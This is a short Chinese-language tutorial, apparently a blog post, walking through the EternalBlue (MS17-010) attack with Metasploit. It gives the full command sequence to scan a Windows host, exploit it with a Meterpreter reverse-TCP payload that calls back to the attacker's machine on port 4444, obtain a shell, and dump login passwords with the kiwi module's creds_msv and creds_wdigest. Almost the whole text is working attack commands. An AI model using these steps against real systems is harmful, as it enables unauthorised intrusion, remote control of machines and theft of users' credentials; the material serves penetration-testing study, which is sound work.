MSF永恒之蓝MS17-010
1. 扫描漏洞
use auxiliary/scanner/smb/smb_ms17_010(加载模块扫描exp)
set RHOSTS 192.168.167.60(设置被扫描ip)
run(开始扫描,查看是否存在漏洞)
检测到可以使用永恒之蓝
2. 漏洞攻击
use exploit/windows/smb/ms17_010_eternalblue(加载攻击模块)
set RHOSTS 192.168.167.60(被攻击IP)
set LHOST 192.168.167.48 (设置本机IP)
set LPORT 4444 (设置连接端口)
set payload windows/x64/meterpreter/reverse_tcp (设置payload) run (开始攻击)
显示攻击IP+端口>>>目标IP+端口(反弹成功)
shell(拿到权限)
3. 获取登录用户名密码
meterpreter > load kiwi
meterpreter > creds_msv
meterpreter > creds_wdigest
拿到登录密码
4. 下面就可以远程登录目标主机了
如文章有错误感谢指出,联系Q:2181796086
如文章有帮助点赞关注一下吧!
学习交流群(Q):947264925